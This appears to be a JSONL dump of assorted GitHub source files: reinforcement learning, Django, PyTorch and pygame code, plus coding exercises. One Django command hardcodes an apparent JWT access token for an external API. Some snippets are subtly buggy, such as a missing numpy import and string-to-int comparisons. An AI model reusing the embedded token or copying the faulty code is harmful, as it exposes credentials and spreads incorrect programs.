policy):\n self.train_device = \"cpu\"\n self.policy = policy.to(self.train_device)\n self.optimizer = torch.optim.Adam(policy.parameters(), lr=5e-3)\n self.gamma = 0.98\n self.states = []\n self.action_probs = []\n self.rewards = []\n\n def episode_finished(self, episode_number):\n # Task 2a: update sigma of the policy exponentially decreasingly.\n # self.policy.update_sigma_exponentially(episode_number + 1)\n\n action_probs = torch.stack(self.action_probs, dim=0) \\\n .to(self.train_device).squeeze(-1)\n rewards = torch.stack(self.rewards, dim=0).to(self.train_device).squeeze(-1)\n self.states, self.action_probs, self.rewards = [], [], []\n\n # DONE: Compute discounted rewards (use the discount_rewards function)\n discounted_rewards = discount_rewards(rewards, self.gamma)\n\n # Task 1c\n discounted_rewards -= torch.mean(discounted_rewards)\n discounted_rewards /= torch.std(discounted_rewards)\n\n # DONE: Compute the optimization term (T1)\n # task 1a\n baseline = 0\n # task 1b\n # baseline = 20\n\n weighted_probs = -action_probs * (discounted_rewards - baseline)\n\n # DONE: Compute the gradients of loss w.r.t. network parameters (T1)\n loss = torch.mean(weighted_probs)\n loss.backward()\n\n # DONE: Update network parameters using self.optimizer and zero gradients (T1)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n def get_action(self, observation, evaluation=False):\n x = torch.from_numpy(observation).float().to(self.train_device)\n\n # DONE: Pass state x through the policy network (T1)\n aprob = self.policy.forward(x)\n\n # DONE: Return mean if evaluation, else sample from the distribution\n # returned by the policy (T1)\n if evaluation:\n action = aprob.mean\n else:\n action = aprob.sample()\n\n # DONE: Calculate the log probability of the action (T1)\n act_log_prob = aprob.log_prob(action)\n\n return action, act_log_prob\n\n def store_outcome(self, observation, action_prob, action_taken, reward):\n self.states.append(observation)\n self.action_probs.append(action_prob)\n self.rewards.append(torch.Tensor([reward]))\n","repo_name":"CristianAbrante/reinforcement-learning-exercises","sub_path":"exercise-5/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4931677351","text":"from django.core.management.base import BaseCommand, CommandParser\nfrom typing import Optional, TypedDict\nfrom starrydata.models import Tag, Node, Term\nimport requests, re, json\n\n# FIX: モデル変更したので修正する必要あり\nclass Command(BaseCommand):\n Tree = TypedDict('Tree', {'id': str, 'modified': int, 'text': str, 'children': Optional[list['Tree']]})\n help = 'Import Initial Data to Database'\n\n def add_arguments(self, parser: CommandParser) -> None:\n parser.add_argument('--docId', type=str)\n\n def handle(self, *args, **options):\n payload = {'docId': options['docId']}\n headers = {\n 'Jwt-Token': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJhcHAiOiJ0cmFuc25vIiwic3ViIjoiMTA4MjU0MDkiLCJsb2dpblR5cGUiOiJlbWFpbCIsImV4cCI6MTYyNjU4MzQ2OCwiaWF0IjoxNjIzOTkxNDY4fQ.ErmJOBrQ22yfgpyMgzMNU4OX-IjOGwzMsWlFb_Nu4PfL9A9KNKD0nMP0dStq5reX7e5PcxJrLTxUcKJ4ID1djw',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json'\n }\n r = requests.post('https://api.transno.com/v3/api/document/view/get', data=json.dumps(payload), headers=headers)\n rootName = r.json()['data']['name']\n # transnoのAPIのレスポンスにspanタグが含まれるため除去\n tree = json.loads(re.sub('','',r.json()['data']['definition']))['nodes']\n\n rootTerm = Term.objects.filter(name=rootName)\n if not rootTerm.exists():\n term = Term(name=rootName, language='jp')\n term.save()\n print('ルート単語生成:「' + rootName + '」')\n\n rootTag = Tag.objects.filter(term_ja__name=rootName)\n if not rootTag.exists():\n tag = Tag(term_ja=rootTerm[0])\n tag.save()\n print('ルートタグ生成:「' + rootName + '」')\n\n rootNode = Node.objects.filter(tag__term_ja=rootTerm[0]).values('id')\n if not rootNode.exists():\n node = Node(tag=rootTag[0])\n node.save()\n print('ルートノード生成「' + rootName + '」')\n\n list(map(lambda parent: self.__importTree(rootNode[0]['id'], parent), tree))\n\n def __importTree(self, parent_id: int, tree: Tree):\n print('処理開始:「' + tree['text'] + '」')\n parent = Node.objects.get(pk=parent_id)\n\n tag = Tag.objects.filter(term_ja__name=tree['text'])\n\n if tree['text'] == '':\n print('処理不要:タグ名が付いていないため')\n pass\n\n if tag.exists():\n node = Node.objects.filter(tag=tag[0], parent=parent)\n if node.exists():\n print('処理不要:タグもノードも存在するため')\n else:\n newNode = Node(tag=tag[0],parent=parent)\n newNode.save()\n print('新規ノード生成 - 親:「' + parent.tag.term_ja.name + '」')\n else:\n newTerm = Term(name=tree['text'], language='jp')\n newTerm.save()\n print('新規単語生成:「' + newTerm.name + '」')\n newTag = Tag(term_ja=newTerm)\n newTag.save()\n print('新規タグ生成:「' + newTag.term_ja.name + '」')\n newNode = Node(tag=tag[0],parent=parent)\n newNode.save()\n print('新規ノード生成 - 親:「' + parent.tag.term_ja.name + '」')\n print('')\n\n node = Node.objects.get(tag=tag[0], parent=parent)\n if 'children' in tree:\n list(map(lambda child: self.__importTree(node.pk, child), tree['children']))\n pass\n","repo_name":"t29mato/tag-tree-api","sub_path":"starrydata/management/commands/import_transno_data.py","file_name":"import_transno_data.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71989826346","text":"\"\"\"\nAssign a loglikelihood score to a sentence and then add the log posterior probability to get the score\nThen subtract the log prior prob of an event\n\"\"\"\n\nfrom lm_scorer.models.auto import AutoLMScorer as LMScorer\nimport json\nimport torch\nfrom visual_heatmap import ConfusionMatrixHeatMap\n\nclass GetLoglikelihood():\n def __init__(self, scenario=\"library\"):\n self.scenario = scenario\n self.data_path = \"/home/CE/skrjanec/data_seg_all_code/\" + self.scenario + \"/join/train_val_line.json\"\n\n # initialize the LM scorer\n self.init_LM_scorer()\n self.lm_ll = []\n\n # read the data json\n # '{\"gold_event\": \"5\", \"segment\": \"he then scanned my card ,\"}'\n self.gold_labels = []\n with open(self.data_path, \"r\") as f:\n print(\"... reading in the segments\")\n for line in f:\n if line:\n segment = json.loads(line)[\"segment\"] # str\n self.lm_ll.append(self.scorer.sentence_score(segment, log=True)) # log probability of sentence; float\n self.gold_labels.append(int(json.loads(line)[\"gold_event\"])) # str\n\n self.gold_labels = torch.tensor(self.gold_labels)\n\n self.lm_ll = torch.tensor(self.lm_ll)\n print(\"number of segments\", self.lm_ll.shape)\n self.lm_ll = self.lm_ll.to(\"cpu\")\n\n # get prior probabilities of events from a file\n self.read_priors()\n print(\"priors\", self.priors)\n self.priors = self.priors.to(\"cpu\")\n\n self.read_posteriors()\n print(\"posteriors\", self.posteriors)\n self.posteriors = self.posteriors.to(\"cpu\")\n\n # sum and subtract\n self.data_likelihood = self.posteriors.detach().clone()\n self.data_likelihood = self.data_likelihood.to(\"cpu\")\n import pdb; pdb.set_trace()\n\n for i in range(self.data_likelihood.shape[1]):\n self.data_likelihood[:, i] += self.lm_ll\n\n for j in range(self.data_likelihood.shape[0]):\n self.data_likelihood[j, :] -= self.priors\n\n\n #self.visualize()\n #import pdb; pdb.set_trace()\n\n # check which event makes a segment more likely\n # take argmax for each row = each segment\n max_LL = torch.argmax(self.data_likelihood, dim=1)\n accuracy = 100 * torch.sum(max_LL == self.gold_labels).item() / self.data_likelihood.shape[0]\n print(\"ACCURACY\", accuracy)\n\n def read_posteriors(self):\n tpath = \"/home/CE/skrjanec/data_seg_all_code/word_language_model_iza/classifier/inscript_lm/logsoftmax_p_e_given_x.pt\" # path to tensor\n self.posteriors = torch.load(tpath)\n print(\"Posterior logp tensor\", self.posteriors)\n\n def init_LM_scorer(self):\n device = \"cuda:1\"\n batch_size = 1\n self.scorer = LMScorer.from_pretrained(\"gpt2\", device=device, batch_size=batch_size)\n\n # scorer.sentence_score([s1, s2...], log=True)\n\n def read_priors(self):\n fpath = \"/home/CE/skrjanec/data_seg_all_code/\" + self.scenario + \"/event_prior.json\"\n with open(fpath, \"r\") as jf:\n self.priors = json.load(jf) # direct probabilities, not log\n\n # make probabilities into torch tensors and logs\n # first arrange them in right order (0, 1...) and as a tensor\n self.priors = torch.tensor([self.priors[str(j)] for j in range(len(self.priors))])\n self.priors = torch.log(self.priors)\n\n def visualize(self):\n # tensor, y_names, x_names, out_name\n y_names = [str(k) for k in range(1, self.data_likelihood.shape[0]+1)] # segment inidices\n x_names = [str(e) for e in range(self.priors.shape[0])]\n out_name = \"dataLL_\" + self.scenario\n import pdb; pdb.set_trace()\n\n ConfusionMatrixHeatMap(self.data_likelihood, y_names, x_names, out_name)\n\n\ngetll = GetLoglikelihood(scenario=\"library\")\n","repo_name":"izaskr/a3_iza","sub_path":"inscript_lm/score_sentences.py","file_name":"score_sentences.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42090640702","text":"'''\n문제 : 곱하기 혹은 더하기\n\n문제 해설 : 일반적으로 특정한 두 수에 대하여 연산을 수행할 때, 대부분은 '+'보다는 'x'가 더 값을 크게 만든다.\n 하지만 두 수 중에서 하나라도 '0' 혹은 '1'인 경우, 곱하기보다는 더하기를 수행하는 것이 효율적이다.\n 즉, 두 수에 대하여 연산을 수행할 때, 두 수 중에서 하나라도 1 이하인 경우에는 더하며, 두 수가 모두 2 이상인\n 경우에는 곱하면 된다.\n'''\n\ns = input()\n\nresult = 0\nfor i in s:\n if i in (0,1) or result in (0,1): # 현재까지의 계산 결과가 1 이하이거나, 현재 처리하고 있는 숫자가 1 이하라면 더하기\n result += int(i)\n else: # 아니라면 곱하기\n result *= int(i)\n\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"CodingTest/Greedy/solution11.py","file_name":"solution11.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15857655795","text":"\nfrom deep_cnn import DeepCNN\nfrom torch import optim\nfrom torch.nn import functional\nimport testing\nfrom preprocessed_dataloader import *\n\n# Setup: initialize the hyperparameters/variables\nnum_epochs = 10 # Number of full passes through the dataset\nearly_stop_epochs = 10\nbatch_size = 128 # Number of samples in each minibatch\nlearning_rate = 0.001\nseed = np.random.seed(42) # Seed the random number generator for reproducibility\np_test = 0.1 # Percent of the overall dataset to reserve for testing\nnum_folds = 2\nresults_dir = './results/kfold-deep'\n\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\n\n# Check if your system supports CUDA\nuse_cuda = torch.cuda.is_available()\n\n# Setup GPU optimization if CUDA is supported\nif use_cuda:\n computing_device = torch.device(\"cuda\")\n extras = {\"num_workers\": 3, \"pin_memory\": True}\n print(\"CUDA is supported\")\nelse: # Otherwise, train on the CPU\n computing_device = torch.device(\"cpu\")\n extras = False\n print(\"CUDA NOT supported\")\n\n\n\n# Instantiate a DeepCNN to run on the GPU or CPU based on CUDA support\nmodel = DeepCNN()\nmodel = model.to(computing_device)\nprint(\"Model on CUDA?\", next(model.parameters()).is_cuda)\n\n# Use bce with logits for additional numerical stability.\ncriterion = functional.binary_cross_entropy_with_logits\n\n\n# Instantiate the gradient descent optimizer - use Adam optimizer with default parameters\noptimizer = optim.Adam(model.parameters())\n\n\nfor i in range(num_folds):\n trace_file = results_dir + '/trace-' + str(i)\n val_file = results_dir + '/val-' + str(i)\n test_file = results_dir + '/test-' + str(i)\n # Setup the training, validation, and testing dataloaders\n train_loader, val_loader, test_loader = processed_split_loaders(batch_size,\n seed,\n p_test=p_test,\n shuffle=True,\n extras=extras)\n # Track the loss across training\n total_loss = []\n avg_minibatch_loss = []\n best_params = None\n\n # Begin training procedure\n for epoch in range(num_epochs):\n\n N = 50\n N_minibatch_loss = 0.0\n current_best_val = 10000000.0\n increasing_epochs = 0\n\n # Get the next minibatch of images, labels for training\n torch.cuda.empty_cache()\n for minibatch_count, (images, labels) in enumerate(train_loader, 0):\n\n # Put the minibatch data in CUDA Tensors and run on the GPU if supported\n images, labels = images.to(computing_device), labels.to(computing_device)\n\n # Zero out the stored gradient (buffer) from the previous iteration\n optimizer.zero_grad()\n\n # Perform the forward pass through the network and compute the loss\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Automagically compute the gradients and backpropagate the loss through the network\n loss.backward()\n\n # Update the weights\n optimizer.step()\n\n # Add this iteration's loss to the total_loss\n total_loss.append(loss.item())\n N_minibatch_loss += float(loss)\n\n if minibatch_count % N == 0 and minibatch_count != 0:\n # Print the loss averaged over the last N mini-batches\n N_minibatch_loss /= N\n with open(trace_file, 'a+') as f:\n f.write(str(epoch + 1) + ',' + str(minibatch_count) + ',' +\n str(N_minibatch_loss) + '\\n')\n\n # Add the averaged loss over N minibatches and reset the counter\n avg_minibatch_loss.append(N_minibatch_loss)\n N_minibatch_loss = 0.0\n\n # validate every 4 N minibatches. as validation more expensive now.\n if minibatch_count % (4 * N) == 0 and minibatch_count != 0:\n\n # validation\n total_val_loss, avg_val_loss, accuracy, precision, recall, balance, \\\n conf = testing.test(\n model,\n computing_device,\n val_loader,\n criterion)\n if total_val_loss < current_best_val:\n current_best_val = total_val_loss\n best_params = model.state_dict()\n increasing_epochs = 0\n else:\n increasing_epochs += 1\n with open(val_file, 'a+') as f1:\n f1.write(str(total_val_loss) + ',' + str(avg_val_loss) + ',' + str(accuracy)\n + ',' + str(precision) + ',' + str(recall) + ',' + str(balance)\n + '\\n')\n torch.save(conf, val_file + '-conf' + str(epoch) + '-' + str(minibatch_count))\n if increasing_epochs > early_stop_epochs:\n break\n\n if best_params is not None:\n model.load_state_dict(best_params)\n # test\n total_test_loss, avg_test_loss, tacc, tpr, tre, tbal, tconf= testing.test(model,\n computing_device,\n test_loader, criterion)\n\n with open(test_file, 'a+') as f2:\n f2.write(str(epoch) + ',' + str(total_loss) + ',' + str(avg_minibatch_loss) + ',' +\n str(total_test_loss) + ',' + str(avg_test_loss) + ',' + str(tacc) + ',' + str(tpr)\n + ',' + str(tre) + ',' + str(tbal) + '\\n')\n torch.save(tconf, test_file + '-test-conf')\n\n","repo_name":"rogermilroy/190_PA3","sub_path":"k_fold_train.py","file_name":"k_fold_train.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7015631178","text":"import awswrangler as wr \nimport boto3\nfrom io import StringIO \n\n\ndf = wr.athena.read_sql_query(sql=\"SELECT * FROM \", database=\"\")\n\n# copy to csv\n\nsession = boto3.Session(profile_name=\"red\")\ns3_res = session.resource('s3')\n\ncsv_buffer = StringIO()\n\ndf.to_csv(csv_buffer)\n\nbucket_name = 'stackvidhya'\n\ns3_object_name = 'df.csv'\n\n\ns3_res.Object(bucket_name, s3_object_name).put(Body=csv_buffer.getvalue())\n\nprint(\"Dataframe is saved as CSV in S3 bucket.\")\n\n","repo_name":"python3boto3/python-on-aws-databases","sub_path":"py-awswrangler-athena-to-df.py","file_name":"py-awswrangler-athena-to-df.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27869224121","text":"\"\"\"\nCheck Permutation: Given two strings write a method to decide if one is a permutation of the other\n\"\"\"\n\n# Approach - 1: sort both the strings and check for equality.\n# Space complexity- O(1) and time - O(log n) where n is the len of the largest string\n\ndef checkPermutation(a,b):\n a = sorted(a)\n b = sorted(b)\n if a==b:\n return True\n else:\n return False\n\nassert checkPermutation(\"abc\",\"bac\") is True\nassert checkPermutation(\"aab\",\"ab\") is False\n","repo_name":"malay95/ctci","sub_path":"1. Arrays And Strings/1.2-ChechPermutation.py","file_name":"1.2-ChechPermutation.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73454867627","text":"\"\"\"\nThis script implements the gradient descent algorithm that is used\nto optimize functions and find their local minima. In this example,\nthe algorithm is demonstrated on linear regression.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as numpy\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n\ndef data_generation():\n \"\"\"\n This function downloads the data and standardizes it\n using built in functions from sklearn.\n \"\"\" \n hitters = pd.read_csv('https://raw.githubusercontent.com/selva86/datasets/master/Hitters.csv', sep=',', header=0)\n hitters=hitters.dropna()\n\n X=hitters.drop('Salary',axis=1)\n X=pd.get_dummies(X,drop_first=True)\n y=hitters.Salary\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)\n\n scaler = preprocessing.StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n X_test = scaler.transform(X_test)\n scaler = preprocessing.StandardScaler().fit(y_train.values.reshape(-1, 1))\n y_train = scaler.transform(y_train.values.reshape(-1, 1)).reshape((-1))\n y_test = scaler.transform(y_test.values.reshape(-1, 1)).reshape((-1))\n\n\n X_train = preprocessing.add_dummy_feature(X_train)\n X_test = preprocessing.add_dummy_feature(X_test)\n\n return X_train, X_test, y_train, y_test\n\ndef objective_function(X, y, beta):\n \"\"\"\n This function implements the objective function for linear \n regression. Beta contains the coefficients.\n \"\"\"\n return np.subtract(y, np.dot(X, beta))\n \n\ndef gradient_of_function(X, y, beta):\n \"\"\"\n This function computes the gradient of the linear regression\n function that we implemented above.\n \"\"\"\n return np.dot(X.T, (np.subtract(y, np.dot(X, beta)))) \n\ndef graddescent(t,max_iter,X,y):\n \"\"\"\n This function implements the gradient descent algorithm. It \n uses the objective_function() and gradient_of_function() \n functions which implement the objective function and its \n gradient respectfully.\n\n Args:\n max_iter(int): The maximum number of iterations that the algorithm \n should run for.\n X(array): The predictor variables, in the form of an array\n y(array): The target variables\n \n Returns:\n beta(array): The values of beta that yield the lowest objective function value\n obj_vals(array): The value of the objective function at each iteration\n\n \"\"\"\n beta = np.zeros(X.shape[1])\n grad_b = gradient_of_function(X, y, beta)\n iter = 0\n obj_vals = []\n while iter < max_iter:\n beta = np.subtract(beta,t*grad_b)\n obj_vals.append(objective_function(X, y, beta))\n grad_b = gradient_of_function(X, y, beta)\n iter += 1\n return np.array(beta), obj_vals\n\ndef main():\n X_train, X_test, y_train, y_test = data_generation()\n betas, objs = graddescent(0.1,100, X_train, y_train)\n plt.plot(objs)\n plt.title(\"Objective function value by iteration\")\n plt.xlabel(\"iterations (t)\")\n plt.ylabel(r'$F(\\beta)$')\n\nif __name__ == '__main__':\n main() ","repo_name":"tejasmhos/Gradient-Descent-Algorithm","sub_path":"gradient_descent.py","file_name":"gradient_descent.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25475705157","text":"from rest_framework import serializers, pagination\n\nfrom .models import Post, Category, Tag\n\n\n# 写入文章数据的接口\nclass PostWriteSerializer(serializers.ModelSerializer):\n class Meta:\n model = Post\n fields = ['id', 'title', 'category', 'tag', 'owner', 'content', 'created_time']\n\n\nclass PostSerializer(serializers.ModelSerializer):\n category = serializers.SlugRelatedField(\n read_only=True,\n slug_field='name',\n )\n tag = serializers.SlugRelatedField(\n read_only=True,\n many=True,\n slug_field='name',\n )\n owner = serializers.SlugRelatedField(\n read_only=True,\n slug_field='username',\n )\n created_time = serializers.DateTimeField(format=\"%Y-%m-%d %H:%M:%S\")\n url = serializers.HyperlinkedIdentityField(view_name='api-post-detail')\n\n class Meta:\n model = Post\n fields = ['id', 'url', 'title', 'category', 'tag', 'owner', 'created_time']\n # extra_kwargs = {\n # 'url': {'view_name': 'api-post-detail'}\n # }\n\n\n# 获取文章详情的serializer\nclass PostDetailSerializer(PostSerializer):\n class Meta:\n model = Post\n fields = ['id', 'title', 'category', 'tag', 'owner', 'content_html', 'created_time']\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name='api-category-detail')\n\n class Meta:\n model = Category\n fields = ['id', 'url', 'name', 'created_time']\n\n\n# 获取每个分类下的文章数据的serializer\nclass CategoryDetailSerializer(CategorySerializer):\n posts = serializers.SerializerMethodField('paginated_posts')\n\n def paginated_posts(self, obj):\n posts = obj.post_set.filter(status=Post.STATUS_NORMAL)\n paginator = pagination.PageNumberPagination()\n page = paginator.paginate_queryset(posts, self.context['request'])\n serializer = PostSerializer(page, many=True, context={'request': self.context['request']})\n return {\n 'count': posts.count(),\n 'results': serializer.data,\n 'previous': paginator.get_previous_link(),\n 'next': paginator.get_next_link(),\n }\n\n class Meta:\n model = Category\n fields = (\n 'id', 'name', 'created_time', 'posts',\n )\n\n\nclass TagSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name='api-tag-detail')\n\n class Meta:\n model = Tag\n fields = ['id', 'url', 'name', 'created_time']\n\n\n# 配置获取该tag下所有文章的serializer\nclass TagDeatilSerializer(TagSerializer):\n posts = serializers.SerializerMethodField('paginated_posts')\n\n def paginated_posts(self, obj):\n posts = obj.post_set.filter(status=Post.STATUS_NORMAL)\n paginator = pagination.PageNumberPagination()\n page = paginator.paginate_queryset(posts, self.context['request'])\n serializer = PostSerializer(page, many=True, context={'request': self.context['request']})\n return {\n 'count': posts.count(),\n 'results': serializer.data,\n 'previous': paginator.get_previous_link(),\n 'next': paginator.get_next_link(),\n }\n\n class Meta:\n model = Tag\n fields = (\n 'id', 'name', 'created_time', 'posts',\n )\n","repo_name":"FreshManzzzzz/typeidea","sub_path":"typeidea/blog/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39723545618","text":"import os\nimport json\nimport csv\n\nCOLUMNS = ['name', 'type', 'lang']\nMESSAGE_LIMIT = 5000\n\nmax_message_count = 0\nall_conversations = []\n\nfor i, inbox in enumerate(os.listdir('messages/inbox')):\n\n # get static data like name and start of conversation\n with open('messages/inbox/%s/message_1.json' % inbox ) as f:\n conversation = json.loads(f.read())\n\n # skip if group conversation\n if(len(conversation['participants']) > 2):\n continue\n\n name = conversation['title']\n clean_name = name.encode('ascii', 'ignore').decode()\n\n # skip if non ascii name\n if(len(clean_name) == 0):\n continue\n\n conv_arr = [clean_name, 'collegue', 'eng']\n\n # aggregate exchanged messages\n count = 0\n for messages in os.listdir('messages/inbox/%s' % inbox):\n\n\n\n # skip if not json\n if messages.split('.')[-1] != 'json':\n continue\n\n with open('messages/inbox/%s/%s' % (inbox, messages)) as f:\n conversation = json.loads(f.read())\n\n for message in conversation['messages']:\n\n if count > MESSAGE_LIMIT:\n break\n\n if(message['type'] != 'Generic'):\n continue\n\n if 'content' not in message:\n continue\n \n content = message['content'].encode('ascii', 'ignore').decode()\n content = content.replace(\"\\n\", \"\")\n content = content.replace(\"\\r\", \"\")\n\n if(len(content) == 0):\n continue\n\n conv_arr.append(content)\n count = count + 1\n\n all_conversations.append(conv_arr)\n if count > max_message_count:\n max_message_count = count\n\nmessage_columns = []\nfor num in range(max_message_count):\n message_columns.append('m' + str(num))\nall_columns = COLUMNS + message_columns\n\n\nwith open(\"conversations.csv\", \"w\", newline = '\\n') as output_file:\n writer = csv.writer(output_file)\n writer.writerow(COLUMNS + message_columns)\n writer.writerows(all_conversations)\n\n\n","repo_name":"zuberek/facenet","sub_path":"scripts/process_conversations.py","file_name":"process_conversations.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24970469195","text":"from records import Record, RecordImpl, PBSParseException\nfrom fields import StringField, IntField, DateField, LongDateField, FillerField\nfrom utils import assertEquals\n\nclass DeliveryRecord(RecordImpl):\n Record.registerRecordType(2, lambda line: DeliveryRecord(line))\n\n _recordType = [Record.DELIVERY_START]\n\n def __init__(self,line=\"\"):\n self.update_fields(dict (\n dataSupplCVR = IntField (\"Data Supplier CVR\", 5, 8).hide(),\n systemCode = StringField (\"System code\", 13,3).hide(),\n deliveryType = IntField (\"Delivery type\",16,4),\n deliveryId = IntField (\"Delivery ID\",20,10),\n filler1 = FillerField (\" \", 30, 19),\n createdDate = DateField (\"Creation date\", 49),\n filler2 = FillerField (\" \", 55, 73)\n ) )\n\n self.recordType = 2\n self.systemCode = \"BS1\"\n\n RecordImpl.__init__(self,line)\n\n self._sections = []\n self.control_amount = 0\n self.control_payload_record_count = 0\n\n def sections(self):\n return self._sections\n\n def sections_payload_count_type(self, type):\n return sum( [ sec.payload_count_type(type) for sec in self._sections ] )\n\n def section_count(self):\n return len(self._sections)\n\n def append(self, section):\n self._sections.append(section)\n self.control_amount += section.controlAmount\n self.control_payload_record_count += section.payload_count()\n\n def end(self, end_delivery_record):\n self.end_record = end_delivery_record\n\n assertEquals(\"Control payment amount does not match\",self.end_record.controlAmount, self.control_amount)\n\n assertEquals(\"Control section count does not match\",self.end_record.numberOfSections, self.section_count())\n\n assertEquals(\"Control number of payment records does not match\",\n self.end_record.numberOfPaymentRecords,\n self.sections_payload_count_type(42))\n\n assertEquals(\"Control number of auxiliary records does not match\",\n self.end_record.numberOfAuxiliaryRecords, \n self.sections_payload_count_type(52) + self.sections_payload_count_type(62))\n\n assertEquals(\"Control number of debtor info records does not match\",\n self.end_record.numberOfDebtorInfoRecords, \n self.sections_payload_count_type(22))\n\n\nclass DeliveryEndRecord(RecordImpl):\n Record.registerRecordType(992, lambda line: DeliveryEndRecord(line))\n\n _recordType = [Record.DELIVERY_END]\n\n def __init__(self,line=\"\"):\n self.update_fields(dict (\n dataSupplCVR = IntField (\"Data Supplier CVR\", 5, 8),\n systemCode = StringField (\"System code\", 13,3),\n deliveryType = IntField (\"Delivery type\",16,4),\n numberOfSections = IntField (\"Number of Sections\",20,11),\n numberOfPaymentRecords = IntField(\"Number of payment records\", 31,11),\n controlAmount = IntField(\"Payload amount\", 42,15), \n numberOfAuxiliaryRecords = IntField(\"Number of aux. records\", 57,11),\n filler3 = FillerField (\"0\", 68, 15),\n numberOfDebtorInfoRecords = IntField(\"Number of Payload records\", 83,11),\n filler4 = FillerField (\"0\", 95, 34)\n ) )\n\n self.recordType = 992\n self.systemCode = \"BS1\"\n\n RecordImpl.__init__(self,line)\n\n","repo_name":"mseebach/PBS-parser","sub_path":"lib/deliveryrecords.py","file_name":"deliveryrecords.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"27745798755","text":"from typing import List\n\n\ndef shortest_word_distance(wordsDict: List[str], word1: str, word2: str):\n '''\n Given an array of strings wordsDict and two different strings that already exist in the array word1 and word2,\n return the shortest distance between these two words in the list\n >>> shortest_word_distance([\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"], \"coding\", \"practice\")\n 3\n >>> shortest_word_distance([\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"], \"makes\", \"coding\")\n 1\n >>> shortest_word_distance([\"a\", \"a\", \"b\", \"b\"], \"a\", \"b\")\n 1\n '''\n idx1 = -1\n idx2 = -1\n shortest_distance = len(wordsDict)\n for idx, word in enumerate(wordsDict):\n if word == word1:\n idx1 = idx\n if word == word2:\n idx2 = idx\n if idx1 >= 0 and idx2 >= 0:\n if abs(idx1 - idx2) < shortest_distance:\n shortest_distance = abs(idx1 - idx2)\n print(shortest_distance)\n","repo_name":"gvu0110/coding-challenges","sub_path":"python/shortest_word_distance.py","file_name":"shortest_word_distance.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16151220873","text":"import pygame\nimport math\nfrom enemy import Enemy\n\npygame.init()\n\n# ----------Game window setup\n\nscreen_width = 1920\nscreen_height = 1080\n\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption('The Castle Never Break')\n\nclock = pygame.time.Clock()\nfps = 30\n\n#----clouds iterator\n\nc_i = 0\n\n#-----------Colors\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\n# ----------Assets\n\n#----Castle\n\n#bg_comp = pygame.image.load('assets/grassy mountains parallax background/Grassy_Mountains_preview_fullcolor.png').convert_alpha()\nbg_layer1 = pygame.image.load('assets/grassy mountains parallax background/layers/clouds_front.png').convert_alpha()\nbg_layer2 = pygame.image.load('assets/grassy mountains parallax background/layers/clouds_mid.png').convert_alpha()\nbg_layer3 = pygame.image.load('assets/grassy mountains parallax background/layers/far_mountains.png').convert_alpha()\nbg_layer4 = pygame.image.load('assets/grassy mountains parallax background/layers/grassy_mountains.png').convert_alpha()\nbg_layer5 = pygame.image.load('assets/grassy mountains parallax background/layers/hill.png').convert_alpha()\nbg_layer6 = pygame.image.load('assets/grassy mountains parallax background/layers/sky.png').convert_alpha()\n\nBg2 = pygame.transform.scale(bg_layer2, (screen_width, screen_height))\nBg3 = pygame.transform.scale(bg_layer3, (screen_width, screen_height))\nBg4 = pygame.transform.scale(bg_layer4, (screen_width, screen_height))\nBg5 = pygame.transform.scale(bg_layer5, (screen_width, screen_height))\nBg6 = pygame.transform.scale(bg_layer6, (screen_width, screen_height))\n\nBg_front = pygame.transform.scale(bg_layer1, (screen_width, screen_height))\nbg_layer2 = pygame.transform.scale(bg_layer2, (screen_width, screen_height))\nbg_layer3 = pygame.transform.scale(bg_layer3, (screen_width, screen_height))\nbg_layer4 = pygame.transform.scale(bg_layer4, (screen_width, screen_height))\nbg_layer5 = pygame.transform.scale(bg_layer5, (screen_width, screen_height))\nbg_layer6 = pygame.transform.scale(bg_layer6, (screen_width, screen_height))\n\nBg_front.set_alpha(128) # \"change opacity\"\n\ncastle_healthy = 